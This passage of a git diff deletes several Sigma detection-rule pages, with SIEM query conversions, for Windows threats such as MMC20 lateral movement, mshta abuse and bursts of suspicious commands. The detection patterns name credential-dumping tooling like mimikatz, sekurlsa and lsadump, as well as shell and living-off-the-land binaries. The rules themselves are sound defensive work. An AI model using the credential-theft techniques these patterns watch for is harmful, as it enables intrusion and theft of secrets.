-(event_id="1" (CommandLine IN ["*DumpCreds*", "*invoke-mimikatz*"] OR (CommandLine IN ["*rpc*", "*token*", "*crypto*", "*dpapi*", "*sekurlsa*", "*kerberos*", "*lsadump*", "*privilege*", "*process*"] CommandLine IN ["*::*"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*DumpCreds.*|.*.*invoke-mimikatz.*)|.*(?:.*(?=.*(?:.*.*rpc.*|.*.*token.*|.*.*crypto.*|.*.*dpapi.*|.*.*sekurlsa.*|.*.*kerberos.*|.*.*lsadump.*|.*.*privilege.*|.*.*process.*))(?=.*(?:.*.*::.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mmc20_lateral_movement.md b/Atomic_Threat_Coverage/Detection_Rules/win_mmc20_lateral_movement.md
deleted file mode 100644
index 92afb33..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mmc20_lateral_movement.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | MMC20 Lateral Movement       |
-|:-------------------------|:------------------|
-| **Description**          | Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1175: Component Object Model and Distributed COM](https://attack.mitre.org/techniques/T1175)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/](https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/)</li><li>[https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing](https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing)</li></ul>  |
-| **Author**               | @2xxeformyshirt (Security Risk Advisors) |
-| Other Tags           | <ul><li>attack.t1021.003</li><li>attack.t1559.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MMC20 Lateral Movement
-id: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd
-description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
-author: '@2xxeformyshirt (Security Risk Advisors)'
-date: 2020/03/04
-references:
-    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
-    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing
-tags:
-    - attack.execution
-    - attack.t1175
-    - attack.t1021.003
-    - attack.t1559.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\svchost.exe'
-        Image: '*\mmc.exe'
-        CommandLine: '*-Embedding*'
-    condition: selection
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\svchost.exe" -and $_.message -match "Image.*.*\\mmc.exe" -and $_.message -match "CommandLine.*.*-Embedding.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\svchost.exe AND winlog.event_data.Image.keyword:*\\mmc.exe AND winlog.event_data.CommandLine.keyword:*\-Embedding*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f1f3bf22-deb2-418d-8cce-e1a45e46a5bd <<EOF
-{
-  "metadata": {
-    "title": "MMC20 Lateral Movement",
-    "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe",
-    "tags": [
-      "attack.execution",
-      "attack.t1175",
-      "attack.t1021.003",
-      "attack.t1559.001"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\svchost.exe AND winlog.event_data.Image.keyword:*\\\\mmc.exe AND winlog.event_data.CommandLine.keyword:*\\-Embedding*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\svchost.exe AND winlog.event_data.Image.keyword:*\\\\mmc.exe AND winlog.event_data.CommandLine.keyword:*\\-Embedding*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MMC20 Lateral Movement'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\svchost.exe AND Image.keyword:*\\mmc.exe AND CommandLine.keyword:*\-Embedding*)
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\svchost.exe" Image="*\\mmc.exe" CommandLine="*-Embedding*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\svchost.exe" Image="*\\mmc.exe" CommandLine="*-Embedding*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\svchost\.exe)(?=.*.*\mmc\.exe)(?=.*.*-Embedding.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mmc_spawn_shell.md b/Atomic_Threat_Coverage/Detection_Rules/win_mmc_spawn_shell.md
deleted file mode 100644
index 2933453..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mmc_spawn_shell.md
+++ /dev/null
@@ -1,190 +0,0 @@
-| Title                    | MMC Spawning Windows Shell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a Windows command line executable started from MMC. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1175: Component Object Model and Distributed COM](https://attack.mitre.org/techniques/T1175)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Karneades, Swisscom CSIRT |
-| Other Tags           | <ul><li>attack.t1059.004</li><li>attack.t1059.005</li><li>attack.t1059.003</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MMC Spawning Windows Shell
-id: 05a2ab7e-ce11-4b63-86db-ab32e763e11d
-status: experimental
-description: Detects a Windows command line executable started from MMC.
-author: Karneades, Swisscom CSIRT
-date: 2019/08/05
-tags:
-    - attack.lateral_movement
-    - attack.t1175
-    - attack.t1059.004
-    - attack.t1059.005
-    - attack.t1059.003
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\mmc.exe'
-        Image:
-            - '*\cmd.exe'
-            - '*\powershell.exe'
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-            - '*\sh.exe'
-            - '*\bash.exe'
-            - '*\reg.exe'
-            - '*\regsvr32.exe'
-            - '*\BITSADMIN*'
-    condition: selection
-fields:
-    - CommandLine
-    - Image
-    - ParentCommandLine
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\mmc.exe" -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\sh.exe" -or $_.message -match "Image.*.*\\bash.exe" -or $_.message -match "Image.*.*\\reg.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\BITSADMIN.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\mmc.exe AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\wscript.exe OR *\\cscript.exe OR *\\sh.exe OR *\\bash.exe OR *\\reg.exe OR *\\regsvr32.exe OR *\\BITSADMIN*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/05a2ab7e-ce11-4b63-86db-ab32e763e11d <<EOF
-{
-  "metadata": {
-    "title": "MMC Spawning Windows Shell",
-    "description": "Detects a Windows command line executable started from MMC.",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1175",
-      "attack.t1059.004",
-      "attack.t1059.005",
-      "attack.t1059.003",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\mmc.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\reg.exe OR *\\\\regsvr32.exe OR *\\\\BITSADMIN*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\mmc.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\reg.exe OR *\\\\regsvr32.exe OR *\\\\BITSADMIN*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MMC Spawning Windows Shell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\n            Image = {{_source.Image}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\mmc.exe AND Image.keyword:(*\\cmd.exe *\\powershell.exe *\\wscript.exe *\\cscript.exe *\\sh.exe *\\bash.exe *\\reg.exe *\\regsvr32.exe *\\BITSADMIN*))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\mmc.exe" (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\sh.exe" OR Image="*\\bash.exe" OR Image="*\\reg.exe" OR Image="*\\regsvr32.exe" OR Image="*\\BITSADMIN*")) | table CommandLine,Image,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\mmc.exe" Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe", "*\\sh.exe", "*\\bash.exe", "*\\reg.exe", "*\\regsvr32.exe", "*\\BITSADMIN*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\mmc\.exe)(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\wscript\.exe|.*.*\cscript\.exe|.*.*\sh\.exe|.*.*\bash\.exe|.*.*\reg\.exe|.*.*\regsvr32\.exe|.*.*\BITSADMIN.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mshta_javascript.md b/Atomic_Threat_Coverage/Detection_Rules/win_mshta_javascript.md
deleted file mode 100644
index f0b5681..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mshta_javascript.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Mshta JavaScript Execution       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies suspicious mshta.exe commands |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html](https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html)</li><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1170/T1170.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1170/T1170.yaml)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-| Other Tags           | <ul><li>attack.t1218.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Mshta JavaScript Execution
-id: 67f113fa-e23d-4271-befa-30113b3e08b1
-description: Identifies suspicious mshta.exe commands
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1170/T1170.yaml
-tags:
-    - attack.execution
-    - attack.defense_evasion
-    - attack.t1170
-    - attack.t1218.005
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\mshta.exe'
-        CommandLine|contains: 'javascript'
-    condition: selection
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - unknown
-level: high
-## todo — add sysmon eid 3 for this rule
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\mshta.exe" -and $_.message -match "CommandLine.*.*javascript.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\mshta.exe AND winlog.event_data.CommandLine.keyword:*javascript*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/67f113fa-e23d-4271-befa-30113b3e08b1 <<EOF
-{
-  "metadata": {
-    "title": "Mshta JavaScript Execution",
-    "description": "Identifies suspicious mshta.exe commands",
-    "tags": [
-      "attack.execution",
-      "attack.defense_evasion",
-      "attack.t1170",
-      "attack.t1218.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\mshta.exe AND winlog.event_data.CommandLine.keyword:*javascript*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\mshta.exe AND winlog.event_data.CommandLine.keyword:*javascript*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Mshta JavaScript Execution'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\mshta.exe AND CommandLine.keyword:*javascript*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\mshta.exe" CommandLine="*javascript*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\mshta.exe" CommandLine="*javascript*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\mshta\.exe)(?=.*.*javascript.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mshta_spawn_shell.md b/Atomic_Threat_Coverage/Detection_Rules/win_mshta_spawn_shell.md
deleted file mode 100644
index 4b2540a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mshta_spawn_shell.md
+++ /dev/null
@@ -1,196 +0,0 @@
-| Title                    | MSHTA Spawning Windows Shell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a Windows command line executable started from MSHTA. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Printer software / driver installations</li><li>HP software</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.trustedsec.com/july-2015/malicious-htas/](https://www.trustedsec.com/july-2015/malicious-htas/)</li></ul>  |
-| **Author**               | Michael Haag |
-| Other Tags           | <ul><li>car.2013-02-003</li><li>car.2013-03-001</li><li>car.2014-04-003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: MSHTA Spawning Windows Shell
-id: 03cc0c25-389f-4bf8-b48d-11878079f1ca
-status: experimental
-description: Detects a Windows command line executable started from MSHTA.
-references:
-    - https://www.trustedsec.com/july-2015/malicious-htas/
-author: Michael Haag
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        ParentImage: '*\mshta.exe'
-        Image:
-            - '*\cmd.exe'
-            - '*\powershell.exe'
-            - '*\wscript.exe'
-            - '*\cscript.exe'
-            - '*\sh.exe'
-            - '*\bash.exe'
-            - '*\reg.exe'
-            - '*\regsvr32.exe'
-            - '*\BITSADMIN*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1170
-    - car.2013-02-003
-    - car.2013-03-001
-    - car.2014-04-003
-    - attack.t1218
-falsepositives:
-    - Printer software / driver installations
-    - HP software
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\mshta.exe" -and ($_.message -match "Image.*.*\\cmd.exe" -or $_.message -match "Image.*.*\\powershell.exe" -or $_.message -match "Image.*.*\\wscript.exe" -or $_.message -match "Image.*.*\\cscript.exe" -or $_.message -match "Image.*.*\\sh.exe" -or $_.message -match "Image.*.*\\bash.exe" -or $_.message -match "Image.*.*\\reg.exe" -or $_.message -match "Image.*.*\\regsvr32.exe" -or $_.message -match "Image.*.*\\BITSADMIN.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.ParentImage.keyword:*\\mshta.exe AND winlog.event_data.Image.keyword:(*\\cmd.exe OR *\\powershell.exe OR *\\wscript.exe OR *\\cscript.exe OR *\\sh.exe OR *\\bash.exe OR *\\reg.exe OR *\\regsvr32.exe OR *\\BITSADMIN*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/03cc0c25-389f-4bf8-b48d-11878079f1ca <<EOF
-{
-  "metadata": {
-    "title": "MSHTA Spawning Windows Shell",
-    "description": "Detects a Windows command line executable started from MSHTA.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1170",
-      "car.2013-02-003",
-      "car.2013-03-001",
-      "car.2014-04-003",
-      "attack.t1218"
-    ],
-    "query": "(winlog.event_data.ParentImage.keyword:*\\\\mshta.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\reg.exe OR *\\\\regsvr32.exe OR *\\\\BITSADMIN*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.ParentImage.keyword:*\\\\mshta.exe AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\reg.exe OR *\\\\regsvr32.exe OR *\\\\BITSADMIN*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'MSHTA Spawning Windows Shell'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:*\\mshta.exe AND Image.keyword:(*\\cmd.exe *\\powershell.exe *\\wscript.exe *\\cscript.exe *\\sh.exe *\\bash.exe *\\reg.exe *\\regsvr32.exe *\\BITSADMIN*))
-```
-
-
-### splunk
-    
-```
-(ParentImage="*\\mshta.exe" (Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\sh.exe" OR Image="*\\bash.exe" OR Image="*\\reg.exe" OR Image="*\\regsvr32.exe" OR Image="*\\BITSADMIN*")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\mshta.exe" Image IN ["*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe", "*\\sh.exe", "*\\bash.exe", "*\\reg.exe", "*\\regsvr32.exe", "*\\BITSADMIN*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\mshta\.exe)(?=.*(?:.*.*\cmd\.exe|.*.*\powershell\.exe|.*.*\wscript\.exe|.*.*\cscript\.exe|.*.*\sh\.exe|.*.*\bash\.exe|.*.*\reg\.exe|.*.*\regsvr32\.exe|.*.*\BITSADMIN.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md b/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
deleted file mode 100644
index 9ac9ec6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
+++ /dev/null
@@ -1,223 +0,0 @@
-| Title                    | Quick Execution of a Series of Suspicious Commands       |
-|:-------------------------|:------------------|
-| **Description**          | Detects multiple suspicious process in a limited timeframe |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://car.mitre.org/wiki/CAR-2013-04-002](https://car.mitre.org/wiki/CAR-2013-04-002)</li></ul>  |
-| **Author**               | juju4 |
-| Other Tags           | <ul><li>car.2013-04-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Quick Execution of a Series of Suspicious Commands
-id: 61ab5496-748e-4818-a92f-de78e20fe7f1
-description: Detects multiple suspicious process in a limited timeframe
-status: experimental
-references:
-    - https://car.mitre.org/wiki/CAR-2013-04-002
-author: juju4
-date: 2019/01/16
-tags:
-    - car.2013-04-002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - arp.exe
-            - at.exe
-            - attrib.exe
-            - cscript.exe
-            - dsquery.exe
-            - hostname.exe
-            - ipconfig.exe
-            - mimikatz.exe
-            - nbtstat.exe
-            - net.exe
-            - netsh.exe
-            - nslookup.exe
-            - ping.exe
-            - quser.exe
-            - qwinsta.exe
-            - reg.exe
-            - runas.exe
-            - sc.exe
-            - schtasks.exe
-            - ssh.exe
-            - systeminfo.exe
-            - taskkill.exe
-            - telnet.exe
-            - tracert.exe
-            - wscript.exe
-            - xcopy.exe
-            - pscp.exe
-            - copy.exe
-            - robocopy.exe
-            - certutil.exe
-            - vssadmin.exe
-            - powershell.exe
-            - wevtutil.exe
-            - psexec.exe
-            - bcedit.exe
-            - wbadmin.exe
-            - icacls.exe
-            - diskpart.exe
-    timeframe: 5m
-    condition: selection | count() by MachineName > 5
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
